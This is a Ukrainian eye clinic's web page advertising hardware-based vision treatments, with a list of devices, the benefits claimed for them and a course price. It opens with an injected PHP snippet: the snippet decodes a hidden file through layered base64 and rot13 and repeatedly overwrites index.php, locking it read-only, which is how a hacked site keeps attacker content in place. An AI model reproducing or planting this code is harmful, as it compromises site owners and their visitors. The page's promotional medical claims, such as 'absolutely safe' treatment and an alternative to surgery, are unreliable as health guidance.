$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Апаратне лікування – МЦ Чайка оптікс

Апаратне лікування

Апаратні методики лікування очей дозволяють зміцнити зір і запобігти подальшому розвитку захворювань без хірургічних операцій. Особливо важливо, що лікування апаратом для поліпшення зору абсолютно безпечно як для дорослих, так і для дітей, оскільки очі апарат не травмує.

Апаратне лікування очей проводиться для профілактики та терапевтичного лікування таких хвороб очей, як:

  • амбліопії,
  • різних видів косоокості,
  • прогресуючої короткозорості,
  • спазму акомодації,
  • астигматизму,
  • далекозорості,
  • інших захворювань.

Особливо ефективне апаратне лікування для дітей дошкільного та шкільного віку з порушенням рефракції різного виду.

У нашій клініці успішно застосовується метод апаратного лікування усіх хвороб зазначених вище.
Апаратне лікування може здійснюватися різними методиками та приладами. Ось перелік апаратів за допомогою яких в нашій клініці пацієнти вдало проходять лікування:

Реамед-А (Амблiокор) – прилад для відновлення гостроти зору і бінокулярних функцій. В основі дії лежить метод відеокомп’ютерного аутотренінгу, який дозволяє відновлювати контроль нервової системи над процесами, що відбуваються в зоровому аналізаторі, розвиває природну здатність головного мозку відновлювати зображення, яке спотворюється на сітківці ока, відновлювати гостроту зору при короткозорості, далекозорості та астигматизмі, особливо ефективний при важких формах аметропіі в дитячому віці.

Макулостимулятор МКС-ц – цей тренажер стимулює сітківку ока. Дія базується на сприйнятті кольору, яке пов’язане із функцією колбочкових клітин сітківки. Для тренувань використовуються такі кольори: червоний (покращує мікроциркуляцію, підвищує чутливість рецепторів), синій (заспокійлива дія, нормалізує сон) та зелений (знижує внутрішньо очний тиск, відновлює біоритм зорового аналізатора).

Апарат спектральний АСО – призначений для лікування амбліопії, короткозорості, спазмів акомодації за допомогою біоритмічного впливу світлом різної довжини хвилі на орган зору. Підвищує гостроту зору, нормалізує загальний стан організму: поліпшується сон, зникають головні болі, втома, підвищує настрій і працездатність.

Апарат для тренування акомодації «Струмочок» – використовується для лікування та стабілізації міопічного процесу, для развитку аккомодації, для стимуляції та тренування зору при амбліопії, гіперметропії, астигматизмі, пресбіопії, для зниження втомлюваності при роботі за комп`ютером та в якості післяопераційного реабілітаційного засобу.

Синоптофор СИНФ-1 – призначений для діагностики та лікування косоокості. За допомогою апарату проводяться лікувальні ортоптичні вправи: усунення функціональної скотоми, асиметричного бінокулярного зору, розвиток нормальної фузійної здібності, рухливості очей.

Апарат вакуумного масажу офтальмологічний АВМО-2М – покращує гемодинаміку, гідродинаміку, знімає м’язові спазми, сприяє очищенню поверхні виразок рогової оболонки, покращує регенерацію, синтез РНК, підвищує оксінацію тканин ока і його придатків, створює спрямований фонофорез, знижує астигматизм після операції, травми, підвищує ефективність медикаментозної терапії.

Амбліопанорама – прилад для стимуляції сітківки ока за допомогою методики тренування зору засліплюючими фігурними полями. Призначений для поліпшення гостроти зору при амбліопії, починаючи з раннього віку, для лікування співдружньої косоокості. Процедура проводиться в окулярах при закритті другого ока оклюдером.

ЛТО-02Р – призначений для лікування широкого спектру захворювань очей в рамках протизапальної, розсмоктуючої та стимулюючої терапії. Принцип дії приладу заснований на впливі низькоенергетичного гелій-неонового лазерного випромінювання.

Комплекс комп’ютерних програм – ефективна альтернатива оперативному втручанню. Це вправи для усунення таких хвороб, як косоокість, короткозорість, далекозорість, амбліопія та ін. До комплексу входять такі програми: «Ай», «Хрестик», «Павучок», «Контур»,  «Relax», «Таблиця Шульте»,  «Клинок-2», «Чібіс», «Квітка».

Реамед – А (Амбліокор)

Реамед – А (Амбліокор)

Прилад для відновлення гостроти зору і бінокулярних функцій. В основі дії лежить метод відеокомп'ютерного аутотренінгу, який дозволяє відновлювати контроль нервової системи над процесами, що відбуваються в зоровому аналізаторі, розвиває природну здатність головного мозку відновлювати зображення, яке спотворюється на сітківці ока, відновлювати гостроту зору при короткозорості, далекозорості та астигматизмі, особливо ефективний при важких формах аметропіі в дитячому віці.

Макулостимулятор МКС-ц

Тренажер стимулює сітківку ока. Дія базується на сприйнятті кольору, яке пов’язане із функцією колбочкових клітин сітківки. Для тренувань використовуються такі кольори: червоний (покращує мікроциркуляцію, підвищує чутливість рецепторів), синій (заспокійлива дія, нормалізує сон) та зелений (знижує внутрішньо очний тиск, відновлює біоритм зорового аналізатора).

Апарат спектральний АСО

Призначений для лікування амбліопії, короткозорості, спазмів акомодації за допомогою біоритмічного впливу світлом різної довжини хвилі на орган зору. Підвищує гостроту зору, нормалізує загальний стан організму: поліпшується сон, зникають головні болі, втома, підвищує настрій і працездатність.

Апарат для тренування акомодації «Струмочок»

Використовується для лікування та стабілізації міопічного процесу, для развитку аккомодації, для стимуляції та тренування зору при амбліопії, гіперметропії, астигматизмі, пресбіопії, для зниження втомлюваності при роботі за комп`ютером та в якості післяопераційного реабілітаційного засобу.

Синоптофор СИНФ-1

Призначений для діагностики та лікування косоокості. За допомогою апарату проводяться лікувальні ортоптичні вправи: усунення функціональної скотоми, асиметричного бінокулярного зору, розвиток нормальної фузійної здібності, рухливості очей.

Комплекс комп’ютерних програм

Ефективна альтернатива оперативному втручанню. Це вправи для усунення таких хвороб, як косоокість, короткозорість, далекозорість, амбліопія та ін. До комплексу входять такі програми: «Ай», «Хрестик», «Павучок», «Контур»,  «Relax», «Таблиця Шульте»,  «Клинок-2», «Чібіс», «Квітка».

Апарат вакуумного масажу офтальмологічний АВМО-2М

Покращує гемодинаміку, гідродинаміку, знімає м'язові спазми, сприяє очищенню поверхні виразок рогової оболонки, покращує регенерацію, синтез РНК, підвищує оксінацію тканин ока і його придатків, створює спрямований фонофорез, знижує астигматизм після операції, травми, підвищує ефективність медикаментозної терапії.

Амбліопанорама

Прилад для стимуляції сітківки ока за допомогою методики тренування зору засліплюючими фігурними полями. Призначений для поліпшення гостроти зору при амбліопії, починаючи з раннього віку, для лікування співдружньої косоокості. Процедура проводиться в окулярах при закритті другого ока оклюдером.

ЛТО-02Р

Призначений для лікування широкого спектру захворювань очей в рамках протизапальної, розсмоктуючої та стимулюючої терапії. Принцип дії приладу заснований на впливі низькоенергетичного гелій-неонового лазерного випромінювання.

Перш ніж призначити апаратне відновлення зору у дорослих та дітей, лікар-фахівець проводить ретельне обстеження пацієнта. Якщо апарат був застосований своєчасно, певний рівень зору матиме підтримку, що цілком може призвести до його значного поліпшення.

Як згадувалося вище, цей спосіб є не тільки абсолютно безпечним, але і абсолютно безболісним, тому можна сміливо погоджуватися лікувати очі у дітей та підлітків.

Вартість посиленого курсу апаратного лікування всього 2700 грн.

Консультація по закінченню курса БЕЗКОШТОВНА!